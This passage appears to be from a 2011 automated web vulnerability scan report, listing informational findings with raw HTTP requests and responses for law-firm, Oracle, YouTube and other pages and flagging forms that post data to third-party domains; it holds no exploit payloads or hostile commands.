Host:   http://www.harbottle.com
Path:   /hnl/pages/article_view_hnl/1689.php

Request 1

GET /hnl/pages/article_view_hnl/1689.php HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:41 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 35226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
<UL class=box-menu>
<LI><A href="javascript:history.back()">Back to list</A></LI></UL>
<A name=index>
<TABLE cellSpacing=0 cellPadding=0 width=600 border=0>
<STYLE>
body,div,td,p,ul,li,a {font-family:Arial; font-size:12px; color:black}
a {color:#333399}
ul,li {margin: 0px 0px 0px 8px; padding: 0px 0px 0px 8px;}
p {margin-top:0; margin-bottom:0.5m}
.contents {font-size:13px; color:#FF9933; font-weight:bold; text-decoration:none}
.headline {color:#6699CC; font-weight:bold; margin-top:1em; margin-bottom:0.5em}
hr {color:#FF9933}
.section {font-size:14px; color:#FF9933; font-weight:bold; margin-top:0.5em; margin-bottom:0.5em}
hr {color:#FF9933}
.contacts {font-size:12px; color:#333399}
.disclaimer {font-size:11.5px; color:#999999}
</STYLE>

<TBODY>
<TR vAlign=top>
<TD rowSpan=6><!-- IMG src="pix/newsletters/EBeyondKnowledge.jpg" --><IMG height=1 src="pix/clear.gif" width=34 was="20"></TD>
<TD align=right><IMG src="pix/newsletters/ESportsMasthead.jpg" width=566> </TD></TR>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%">
<TBODY>
<TR>
<TD colSpan=2><IMG height=4 src="pix/clear.gif" width=1></TD></TR>
<TR vAlign=center>
<TD><IMG height=1 src="pix/clear.gif" width=35><SPAN class=headline>March 2005</SPAN><BR></TD>
<TD align=right><IMG src="pix/newsletters/50th_logo.jpg"></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%">
<TBODY>
<TR>
<TD vAlign=top width="48%">
<TABLE cellSpacing=0 cellPadding=0>
<TBODY>
<TR vAlign=top>
<TD vAlign=top width=13><IMG src="pix/square_FF9933.gif" border=0></TD>
<TD vAlign=top><A class=contents href="pages/article_view_hnl/1689.php#A146">A novel way of tackling ambush marketing</A></TD></TR>
<TR class=shade vAlign=top>
<TD vAlign=top width=13><IMG src="pix/square_FF9933.gif" border=0></TD>
<TD vAlign=top><A class=con
...[SNIP]...

Request 2

GET /hnl/pages/article_view_hnl/1689.php HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:02 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 35139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</h1>

<A name=index>
<TABLE cellSpacing=0 cellPadding=0 width=600 border=0>
<STYLE>
body,div,td,p,ul,li,a {font-family:Arial; font-size:12px; color:black}
a {color:#333399}
ul,li {margin: 0px 0px 0px 8px; padding: 0px 0px 0px 8px;}
p {margin-top:0; margin-bottom:0.5m}
.contents {font-size:13px; color:#FF9933; font-weight:bold; text-decoration:none}
.headline {color:#6699CC; font-weight:bold; margin-top:1em; margin-bottom:0.5em}
hr {color:#FF9933}
.section {font-size:14px; color:#FF9933; font-weight:bold; margin-top:0.5em; margin-bottom:0.5em}
hr {color:#FF9933}
.contacts {font-size:12px; color:#333399}
.disclaimer {font-size:11.5px; color:#999999}
</STYLE>

<TBODY>
<TR vAlign=top>
<TD rowSpan=6><!-- IMG src="pix/newsletters/EBeyondKnowledge.jpg" --><IMG height=1 src="pix/clear.gif" width=34 was="20"></TD>
<TD align=right><IMG src="pix/newsletters/ESportsMasthead.jpg" width=566> </TD></TR>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%">
<TBODY>
<TR>
<TD colSpan=2><IMG height=4 src="pix/clear.gif" width=1></TD></TR>
<TR vAlign=center>
<TD><IMG height=1 src="pix/clear.gif" width=35><SPAN class=headline>March 2005</SPAN><BR></TD>
<TD align=right><IMG src="pix/newsletters/50th_logo.jpg"></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%">
<TBODY>
<TR>
<TD vAlign=top width="48%">
<TABLE cellSpacing=0 cellPadding=0>
<TBODY>
<TR vAlign=top>
<TD vAlign=top width=13><IMG src="pix/square_FF9933.gif" border=0></TD>
<TD vAlign=top><A class=contents href="pages/article_view_hnl/1689.php#A146">A novel way of tackling ambush marketing</A></TD></TR>
<TR class=shade vAlign=top>
<TD vAlign=top width=13><IMG src="pix/square_FF9933.gif" border=0></TD>
<TD vAlign=top><A class=contents href="pages/article_view_hnl/1689.php#A145">Dispute in football about use of pho
...[SNIP]...

17.8. http://www.harbottle.com/hnl/pages/articles/direct_beauty_products_trimsole.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.harbottle.com
Path:   /hnl/pages/articles/direct_beauty_products_trimsole.php

Request 1

GET /hnl/pages/articles/direct_beauty_products_trimsole.php HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/pubs/479
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:48 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 15628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
<UL class=box-menu>
<LI><A href="javascript:history.back()">Back to list</A></LI></UL>
<P>Harbottle &amp; Lewis has advised Direct Beauty Products, one of the country’s largest independent suppliers of premium beauty products, on the commercial arrangements for its new product TrimSole® Footwear.</P>
<P>Endorsed by TV star Amanda Holden, TrimSole® is a range of toning footwear, and has established a dedicated legion of customers since its launch in 2010. Toning footwear is the fastest growing segment in the footwear industry. </P>
<P>Simon Gook, MD said, “<EM>I am delighted to have Harbottle &amp; Lewis representing TrimSole®. The next few years will see TrimSole® expand into overseas markets and we are looking forward to a very exciting period of further growth for the brand</EM>”.<BR></P></p>
<!-- FUNC arg1="$title" fn="social_bm" --> </div>
<div class="side-column">
<div class="highlights box">
<h2>Site Highlights</h2>
<ul>
<!-- -->
<li><h3><a href="pages/articles/direct_beauty_products_trimsole.php"><span>05 Aug 11</span></a>
<strong>Press Release</strong></h3>
<p>Harbottle & Lewis Advise Direct Beauty Products on TrimSole® Footwear</p></li>
<li><h3><a href="pages/articles/redkite_financial_markets_investment_dfj_esprit.php"><span>29 Jul 11</span></a>
<strong>Press Release</strong></h3>
<p>Harbottle & Lewis Advise Redkite Financial Markets on Investment From DFJ Esprit</p></li>
<!-- -->
<!-- -->
<!-- -->
<!-- -->
<li><h3><a href="pages/article_view_hnl/9733.php"><span>19 May 11</span></a>
<strong>Article</strong></h3>
<p>Interflora v Marks & Spencer - the Impact on IP, Competitiveness and Advertising</p></li>
<!-- -->
</ul> </div>
<!-- include (839) -->
<!-- contact box 470 --><!-- 0 SELECT object_id FROM relation WHERE rtype=1019 AND subject_id=0 AND priority > 0 ORDER BY priority -->
</div>
</div>
</div>

...[SNIP]...

Request 2

GET /hnl/pages/articles/direct_beauty_products_trimsole.php HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:03 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 15541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</h1>

<P>Harbottle &amp; Lewis has advised Direct Beauty Products, one of the country’s largest independent suppliers of premium beauty products, on the commercial arrangements for its new product TrimSole® Footwear.</P>
<P>Endorsed by TV star Amanda Holden, TrimSole® is a range of toning footwear, and has established a dedicated legion of customers since its launch in 2010. Toning footwear is the fastest growing segment in the footwear industry. </P>
<P>Simon Gook, MD said, “<EM>I am delighted to have Harbottle &amp; Lewis representing TrimSole®. The next few years will see TrimSole® expand into overseas markets and we are looking forward to a very exciting period of further growth for the brand</EM>”.<BR></P></p>
<!-- FUNC arg1="$title" fn="social_bm" --> </div>
<div class="side-column">
<div class="highlights box">
<h2>Site Highlights</h2>
<ul>
<!-- -->
<li><h3><a href="pages/articles/direct_beauty_products_trimsole.php"><span>05 Aug 11</span></a>
<strong>Press Release</strong></h3>
<p>Harbottle & Lewis Advise Direct Beauty Products on TrimSole® Footwear</p></li>
<li><h3><a href="pages/articles/redkite_financial_markets_investment_dfj_esprit.php"><span>29 Jul 11</span></a>
<strong>Press Release</strong></h3>
<p>Harbottle & Lewis Advise Redkite Financial Markets on Investment From DFJ Esprit</p></li>
<!-- -->
<!-- -->
<!-- -->
<!-- -->
<li><h3><a href="pages/article_view_hnl/9733.php"><span>19 May 11</span></a>
<strong>Article</strong></h3>
<p>Interflora v Marks & Spencer - the Impact on IP, Competitiveness and Advertising</p></li>
<!-- -->
</ul> </div>
<!-- include (839) -->
<!-- contact box 470 --><!-- 0 SELECT object_id FROM relation WHERE rtype=1019 AND subject_id=0 AND priority > 0 ORDER BY priority -->
</div>
</div>
</div>
<div style="clear: both"></div>
</div><!-- /main-content -->
<div id=
...[SNIP]...

17.9. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.oraclecfo.com
Path:   /Main/Solutions/Solutions_w.html

Request 1

GET /Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82 HTTP/1.1
Host: www.oraclecfo.com
Proxy-Connection: keep-alive
Referer: http://www.oraclecfo.com/Main/Home/Home_w.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hbwp4rmax55h0c45eof5yo45; _pk_ref.3.469e=%5B%22%22%2C%22%22%2C1315343453%2C%22http%3A%2F%2Fwww.oracle.com%2Findex.html%23%22%5D; _pk_id.3.469e=39092d4d809db2e1.1315343453.1.1315343453.1315343453; _pk_ses.3.469e=*; OracleCFOCountry=282; OracleCFOLanguage=46; OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:12:24 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 50539


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['CFOForm'];
if (!theForm) {
theForm = document.CFOForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=xxLpubPyMH8WlPL1KC1Cl97yCQ5agbMCK77u8WUxAL2WNEamF9RLfFzaYd6uAcV29_OFRlkJ_GhzXXxwCoqyz1QhmyY1&amp;t=634231599793442370" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=nXQOPGhqmFIRc_W4VpICinL5LLDlZmU6yKRvsQB0r-g0fb6jWj2rK3yZgL357FWfSS7NPZAOXLpSDEEIO1QdAsYt5hv0lktFq7-Ltz5-vCfVFL4uVv9H96tDckKtg2miRROMBUptJkt5bRzGjhOV_K6Qg_A1&amp;t=ffffffffce95b69e" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=4_4jN_OMeI22vqWZkAs5U7htoHKf-_-9LA1mFpO-TPweLk-2Y7iAJMxCXuieNf4DNmc9Y8x0ZtSbUHHUIYyYvvDFLwguf4ZnmH3uSnmNEVMlfXBZFG31wQ4e76Y0z-m1YxANU6Uc_HmF7FjaruRAB4pVFKFyLeVF6MMq0GlM_bm6R8cj0&amp;t=ffffffffce95b69e" type="text/javascript"></script>
<script
...[SNIP]...

Request 2

GET /Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82 HTTP/1.1
Host: www.oraclecfo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hbwp4rmax55h0c45eof5yo45; _pk_ref.3.469e=%5B%22%22%2C%22%22%2C1315343453%2C%22http%3A%2F%2Fwww.oracle.com%2Findex.html%23%22%5D; _pk_id.3.469e=39092d4d809db2e1.1315343453.1.1315343453.1315343453; _pk_ses.3.469e=*; OracleCFOCountry=282; OracleCFOLanguage=46; OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:15:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 50512


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPaA8FDzhjZTNhY2ZjN2FiYTRjORgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCQU3Y3RsMDAkY3BoUGxhY2Vob2xkZXIkU29sdXRpb25zX3cxJHJhZE11bHRpUGFnZVNvbHV0aW9ucwUhY3RsMDAkdWNOYXZpZ2F0aW9uQmFyJHJjYkxhbmd1YWdlBTZjdGwwMCRjcGhQbGFjZWhvbGRlciRTb2x1dGlvbnNfdzEkcmFkVGFiU3RyaXBTb2x1dGlvbnMFRmN0bDAwJGNwaFBsYWNlaG9sZGVyJFNvbHV0aW9uc193MSRTb2x1dGlvbnNfdXNlckNvbnRyb2wkcmFkVHJlZUFydGljbGUFQ2N0bDAwJGNwaFBsYWNlaG9sZGVyJFNvbHV0aW9uc193MSRjdHJBcnRpY2xlRGV0YWlsJHJhZFdpbmRvd01hbmFnZXIFRGN0bDAwJGNwaFBsYWNlaG9sZGVyJFNvbHV0aW9uc193MSRjdHJBcnRpY2xlRGV0YWlsJHJhZFdpbmRvd0NvbW1lbnRzBUljdGwwMCRjcGhQbGFjZWhvbGRlciRTb2x1dGlvbnNfdzEkY3RyQXJ0aWNsZURldGFpbCRyYWRXaW5kb3dFbWFpbFRvRnJpZW5kBSFjdGwwMCRCb3R0b21CYXIxJHJhZFdpbmRvd01hbmFnZXIFI2N0bDAwJEJvdHRvbUJhcjEkcmFkV2luZG93Q29udGFjdFVzBSFjdGwwMCR1Y05hdmlnYXRpb25CYXIkcmNiTGFuZ3VhZ2UPFCsAAgUMRW5nbGlzaCAoVVMpBQI0NmRThAXiW74fMhlUkw6cdhbCtclo8A==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['CFOForm'];
if (!theForm) {
theForm = document.CFOForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=xxLpubPyMH8WlPL1KC1Cl97yCQ5agbMCK77u8WUxAL2WNEamF9RLfFzaYd6uAcV29_OFRlkJ_GhzXXxwCoqyz1QhmyY1&amp;t=634231599793442370" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=nXQOPGhqmFIRc_W4VpICinL5LLDlZmU6yKRvsQB0r-g0fb6jWj2rK3yZgL357FWfSS7NPZAOXLpSDEEIO1QdAsYt5hv0lktFq7-Ltz5-vCfVFL4uVv9H96tDckKtg2miRROMBUptJkt5bRzGjhOV_K6Qg_A1&amp;t=ffffffffce95b69e" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=4_4jN_OMeI22vqWZkAs5U7htoHKf-_-9LA1mFpO-TPweLk-2Y7iAJMxCXuieNf4DNmc9Y8x0ZtSbUHHUIYyYvvDFLwguf4ZnmH3uSnmNEVMlfXBZFG31wQ4e76Y0z-m1YxANU6Uc_HmF7FjaruRAB4pVFKFyLeVF6MMq0GlM_bm6R8cj0&amp;t=ffffffffce95b69e" type="text/javascript"></script>
<script
...[SNIP]...

17.10. http://www.youtube.com/v/JWMKXb1Guq4

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.youtube.com
Path:   /v/JWMKXb1Guq4

Request 1

GET /v/JWMKXb1Guq4?version=3&autohide=1&showinfo=0 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/tour
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=f_pXTnp7lsc; PREF=fv=10.3.183

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:33:58 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 3187
Content-Type: application/x-shockwave-flash

...[SNIP]...

Request 2

GET /v/JWMKXb1Guq4?version=3&autohide=1&showinfo=0 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=f_pXTnp7lsc; PREF=fv=10.3.183

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:20 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 3172
Content-Type: application/x-shockwave-flash

...[SNIP]...

18. Cross-domain POST
There are 5 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


18.1. http://education.oracle.com/education/netcall/talk_to_us_ca.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /education/netcall/talk_to_us_ca.html

Issue detail

The page contains a form which POSTs data to the domain my.hyperphonelink.com. The form contains the following fields:

Request

GET /education/netcall/talk_to_us_ca.html HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ETag: "7ad9ad-840-4dcb6cc7"
Content-Type: text/html; charset=utf-8
Last-Modified: Thu, 12 May 2011 05:14:47 GMT
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=300+0;age=0;ecid=72057850008802081,0)
Content-Length: 2112
Date: Tue, 06 Sep 2011 15:59:32 GMT
Accept-Ranges: bytes

<html>
<head>
<title>Place a Call</title>
<script language="Javascript" src="http://education.oracle.com/education/jscripts/ou_lib.js"></script>
<script language="Javascript" src="/education/netcall/n
...[SNIP]...
<br>
<form name="personalInfo" method="post" action="http://my.hyperphonelink.com/hpl/hyperphone.asp" >
<input type="hidden" name="udo_referer" value="">
...[SNIP]...

18.2. http://education.oracle.com/education/netcall/talk_to_us_us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /education/netcall/talk_to_us_us.html

Issue detail

The page contains a form which POSTs data to the domain my.hyperphonelink.com. The form contains the following fields:

Request

GET /education/netcall/talk_to_us_us.html HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ETag: "7ad9ac-848-4dcb6cc7"
Content-Type: text/html; charset=utf-8
Last-Modified: Thu, 12 May 2011 05:14:47 GMT
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=300+0;age=0;ecid=72057862893703826,0)
Content-Length: 2120
Date: Sat, 03 Sep 2011 12:44:58 GMT
Accept-Ranges: bytes

<html>
<head>
<title>Place a Call</title>
<script language="Javascript" src="http://education.oracle.com/education/jscripts/ou_lib.js"></script>
<script language="Javascript" src="/education/netcall/n
...[SNIP]...
<br>
<form name="personalInfo" method="post" action="http://my.hyperphonelink.com/hpl/hyperphone.asp" >
<input type="hidden" name="udo_referer" value="">
...[SNIP]...

18.3. http://www.readwriteweb.com/enterprise/2010/11/oracle.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.readwriteweb.com
Path:   /enterprise/2010/11/oracle.php

Issue detail

The page contains a form which POSTs data to the domain readwriteweb.us2.list-manage.com. The form contains the following fields:

Request

GET /enterprise/2010/11/oracle.php HTTP/1.1
Host: www.readwriteweb.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:43 GMT
Server: Apache/2.x (Hardened)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 43029
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

...[SNIP]...
</a>
                   <form action="http://readwriteweb.us2.list-manage.com/subscribe?u=f5a0df2d9082c86e808468c10&id=b013526bbf" method="post" target="popupwindow" onsubmit="window.open('http://www.readwriteweb.com/newsletters/index.php', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
                       <input id="email" class="textfield" type="text" maxlength="80" name="MERGE0" onblur="if(this.value=='')value=this.defaultValue;" onfocus="if(this.value==this.defaultValue)value=''" value="Your
...[SNIP]...

18.4. http://www.sophelle.com/Contact-Us/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /Contact-Us/

Issue detail

The page contains a form which POSTs data to the domain sophelle.web5.hubspot.com. The form contains the following fields:

Request

GET /Contact-Us/ HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
